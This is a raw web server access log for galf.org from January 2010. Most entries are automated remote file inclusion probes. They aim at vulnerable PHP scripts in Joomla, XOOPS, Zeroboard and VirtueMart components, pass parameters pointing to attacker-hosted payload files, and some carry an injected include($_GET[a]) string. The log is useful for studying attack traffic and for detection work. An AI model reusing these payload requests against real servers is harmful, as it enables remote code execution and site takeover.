216.17.109.216 - - [24/Jan/2010:22:12:34 -0800] "GET /logs/access_090629.log//include/admin.lib.inc.php?dir=http://vegasus.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.94.33.242 - - [24/Jan/2010:22:14:45 -0800] "GET /logs//index.php?option=com_facileforms&Itemid=&mosConfig.absolute.path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
85.94.33.242 - - [24/Jan/2010:22:14:45 -0800] "GET /index.php?option=com_facileforms&Itemid=&mosConfig.absolute.path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
85.94.33.242 - - [24/Jan/2010:22:14:45 -0800] "GET /logs//index.php?option=com_facileforms&Itemid=&mosConfig.absolute.path=http://www.alst.ru/cmd??&cmd=x HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
85.94.33.242 - - [24/Jan/2010:22:14:45 -0800] "GET /index.php?option=com_facileforms&Itemid=&mosConfig.absolute.path=http://www.alst.ru/cmd??&cmd=x HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
216.17.109.216 - - [24/Jan/2010:22:16:35 -0800] "GET /logs/access.log//include/admin.lib.inc.php?dir=http://vegasus.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
216.17.109.216 - - [24/Jan/2010:22:16:35 -0800] "GET /logs//include/admin.lib.inc.php?dir=http://vegasus.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
216.17.109.216 - - [24/Jan/2010:22:16:35 -0800] "GET /include/admin.lib.inc.php?dir=http://vegasus.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
216.17.109.216 - - [24/Jan/2010:22:16:35 -0800] "GET /logs/access.log//include/admin.lib.inc.php?dir=http://vegasus.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
216.17.109.216 - - [24/Jan/2010:22:16:35 -0800] "GET /include/admin.lib.inc.php?dir=http://vegasus.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
216.17.109.216 - - [24/Jan/2010:22:16:35 -0800] "GET /logs//include/admin.lib.inc.php?dir=http://vegasus.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
62.140.23.192 - - [24/Jan/2010:22:31:53 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.turismohuanchaco.com/fid1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
62.140.23.192 - - [24/Jan/2010:22:31:54 -0800] "GET /logs/access_100104.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.turismohuanchaco.com/fid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.192 - - [24/Jan/2010:22:31:54 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.turismohuanchaco.com/fid1.txt?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
62.140.23.192 - - [24/Jan/2010:22:35:23 -0800] "GET /logs/access_100104.log///?_SERVER[DOCUMENT_ROOT]=http://www.turismohuanchaco.com/fid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.192 - - [24/Jan/2010:22:35:24 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.turismohuanchaco.com/fid1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
62.140.23.192 - - [24/Jan/2010:22:35:24 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.turismohuanchaco.com/fid1.txt?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [24/Jan/2010:22:36:22 -0800] "GET /logs/access_090803.log//index.php?option=com_content&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [24/Jan/2010:22:36:22 -0800] "GET /logs//index.php?option=com_content&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [24/Jan/2010:22:36:22 -0800] "GET /index.php?option=com_content&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [24/Jan/2010:22:36:26 -0800] "GET /index.php?option=com_content&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [24/Jan/2010:22:36:26 -0800] "GET /logs//index.php?option=com_content&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [24/Jan/2010:22:36:26 -0800] "GET /logs/access_090803.log//index.php?option=com_content&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.125.44.136 - - [24/Jan/2010:22:39:30 -0800] "GET /logs/access_091116.log//index.php?option=com_content&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.125.44.136 - - [24/Jan/2010:22:39:30 -0800] "GET /index.php?option=com_content&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.125.44.136 - - [24/Jan/2010:22:39:30 -0800] "GET /logs//index.php?option=com_content&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.6.163.21 - - [24/Jan/2010:22:39:33 -0800] "GET /logs/access.log HTTP/1.1" 200 130197 "-" "Mozilla/8.0" "www.galf.org"
202.125.44.136 - - [24/Jan/2010:22:39:38 -0800] "GET /index.php?option=com_content&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.125.44.136 - - [24/Jan/2010:22:39:38 -0800] "GET /logs/access_091116.log//index.php?option=com_content&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.125.44.136 - - [24/Jan/2010:22:39:38 -0800] "GET /logs//index.php?option=com_content&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.125.44.136 - - [24/Jan/2010:22:39:52 -0800] "GET /index.php?option=com_content&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.125.44.136 - - [24/Jan/2010:22:39:52 -0800] "GET /logs/access_091116.log%20%20//index.php?option=com_content&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.125.44.136 - - [24/Jan/2010:22:39:52 -0800] "GET /logs//index.php?option=com_content&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.125.44.136 - - [24/Jan/2010:22:39:56 -0800] "GET /logs//index.php?option=com_content&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.125.44.136 - - [24/Jan/2010:22:39:56 -0800] "GET /index.php?option=com_content&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.125.44.136 - - [24/Jan/2010:22:39:56 -0800] "GET /logs/access_091116.log%20%20//index.php?option=com_content&Itemid=&mosConfig.absolute.path=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.6.163.21 - - [24/Jan/2010:22:39:59 -0800] "GET /logs/access.log HTTP/1.1" 200 132220 "-" "Mozilla/8.0" "www.galf.org"
209.172.33.230 - - [24/Jan/2010:22:44:46 -0800] "GET /logs//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.172.33.230 - - [24/Jan/2010:22:44:46 -0800] "GET /xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.172.33.230 - - [24/Jan/2010:22:44:46 -0800] "GET /logs/access.log%20%20//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.47 - - [24/Jan/2010:22:46:25 -0800] "GET /logs/access_091116.log//bbs/skin/uks_gallery_v3010/////setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.47 - - [24/Jan/2010:22:46:25 -0800] "GET /bbs/skin/uks_gallery_v3010/////setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.47 - - [24/Jan/2010:22:46:25 -0800] "GET /logs//bbs/skin/uks_gallery_v3010/////setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.47 - - [24/Jan/2010:22:46:50 -0800] "GET /logs/access_091109.log//bbs/skin/uks_gallery_v3010/////setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.79.246.80 - - [24/Jan/2010:22:49:02 -0800] "GET /logs//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.79.246.80 - - [24/Jan/2010:22:49:02 -0800] "GET /xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.79.246.80 - - [24/Jan/2010:22:49:02 -0800] "GET /logs/access.log%20%20//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.79.246.80 - - [24/Jan/2010:22:49:08 -0800] "GET /logs/access.log%20%20//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.79.246.80 - - [24/Jan/2010:22:49:08 -0800] "GET /xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.79.246.80 - - [24/Jan/2010:22:49:08 -0800] "GET /logs//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
206.225.93.58 - - [24/Jan/2010:22:50:42 -0800] "GET /logs/access.log%20%20//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
206.225.93.58 - - [24/Jan/2010:22:50:42 -0800] "GET /xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
206.225.93.58 - - [24/Jan/2010:22:50:43 -0800] "GET /logs//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.106.208 - - [24/Jan/2010:22:54:17 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
209.172.33.230 - - [24/Jan/2010:23:00:40 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.172.33.230 - - [24/Jan/2010:23:00:40 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.172.33.230 - - [24/Jan/2010:23:00:45 -0800] "GET /logs/access.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
94.124.120.47 - - [24/Jan/2010:23:01:16 -0800] "GET /logs/access_090727.log////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.47 - - [24/Jan/2010:23:01:16 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.47 - - [24/Jan/2010:23:01:16 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.47 - - [24/Jan/2010:23:01:23 -0800] "GET /logs/access_091012.log////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.227.119.152 - - [24/Jan/2010:23:01:42 -0800] "GET /logs/access_091221.log%20%20//components/com_sitemap/sitemap.php?mosConfig.absolute.path=http://qqe.ru//forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.227.119.152 - - [24/Jan/2010:23:01:42 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig.absolute.path=http://qqe.ru//forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.227.119.152 - - [24/Jan/2010:23:01:42 -0800] "GET /logs/access_090817.log%20%20//components/com_sitemap/sitemap.php?mosConfig.absolute.path=http://qqe.ru//forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.227.119.152 - - [24/Jan/2010:23:01:42 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig.absolute.path=http://qqe.ru//forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.227.119.152 - - [24/Jan/2010:23:01:46 -0800] "GET /logs/access_090720.log%20%20//components/com_sitemap/sitemap.php?mosConfig.absolute.path=http://qqe.ru//forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.227.119.152 - - [24/Jan/2010:23:01:51 -0800] "GET /logs/access_091123.log%20%20//components/com_sitemap/sitemap.php?mosConfig.absolute.path=http://qqe.ru//forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.227.119.152 - - [24/Jan/2010:23:01:57 -0800] "GET /logs/access_091130.log%20%20//components/com_sitemap/sitemap.php?mosConfig.absolute.path=http://qqe.ru//forum/avatars/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.227.119.152 - - [24/Jan/2010:23:02:36 -0800] "GET /logs/access_090720.log//components/com_sitemap/sitemap.php?mosConfig.absolute.path=http://qqe.ru//forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.79.246.80 - - [24/Jan/2010:23:04:12 -0800] "GET /logs/access.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
77.79.246.80 - - [24/Jan/2010:23:04:12 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
77.79.246.80 - - [24/Jan/2010:23:04:12 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
206.225.93.58 - - [24/Jan/2010:23:04:58 -0800] "GET /logs/access.log//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.176.79 - - [24/Jan/2010:23:05:10 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.176.79 - - [24/Jan/2010:23:05:10 -0800] "GET /bbs//delete_all.php?board_skin_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.176.79 - - [24/Jan/2010:23:05:10 -0800] "GET /logs/access.log//bbs//delete_all.php?board_skin_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.79.246.80 - - [24/Jan/2010:23:05:29 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
77.79.246.80 - - [24/Jan/2010:23:05:29 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
77.79.246.80 - - [24/Jan/2010:23:05:29 -0800] "GET /logs/access.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
206.225.93.58 - - [24/Jan/2010:23:07:18 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
206.225.93.58 - - [24/Jan/2010:23:07:18 -0800] "GET /logs/access.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
206.225.93.58 - - [24/Jan/2010:23:07:18 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
202.131.226.52 - - [24/Jan/2010:23:10:17 -0800] "GET /logs/access.log////delete_all.php/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://jil.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [24/Jan/2010:23:10:17 -0800] "GET ///delete_all.php/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://jil.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [24/Jan/2010:23:10:17 -0800] "GET /logs////delete_all.php/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://jil.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.106.208 - - [24/Jan/2010:23:11:08 -0800] "GET /cendoc/?D=D HTTP/1.1" 200 526 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
77.79.246.80 - - [24/Jan/2010:23:13:01 -0800] "GET /logs/access_091123.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.79.246.80 - - [24/Jan/2010:23:13:01 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.79.246.80 - - [24/Jan/2010:23:13:01 -0800] "GET /logs/access_091130.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.79.246.80 - - [24/Jan/2010:23:13:01 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [24/Jan/2010:23:13:45 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [24/Jan/2010:23:13:45 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [24/Jan/2010:23:13:45 -0800] "GET /logs/access_090720.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.79.246.80 - - [24/Jan/2010:23:13:59 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.79.246.80 - - [24/Jan/2010:23:13:59 -0800] "GET /logs/access_091123.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.79.246.80 - - [24/Jan/2010:23:13:59 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.79.246.80 - - [24/Jan/2010:23:13:59 -0800] "GET /logs/access_091130.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [24/Jan/2010:23:14:07 -0800] "GET /logs/access_090914.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [24/Jan/2010:23:14:22 -0800] "GET /logs/access_090720.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [24/Jan/2010:23:14:22 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [24/Jan/2010:23:14:22 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [24/Jan/2010:23:14:31 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [24/Jan/2010:23:14:31 -0800] "GET /logs/access_090720.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [24/Jan/2010:23:14:31 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [24/Jan/2010:23:14:33 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [24/Jan/2010:23:14:33 -0800] "GET /logs/access_090720.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [24/Jan/2010:23:14:33 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [24/Jan/2010:23:14:45 -0800] "GET /logs/access_090914.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [24/Jan/2010:23:14:51 -0800] "GET /logs/access_090914.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
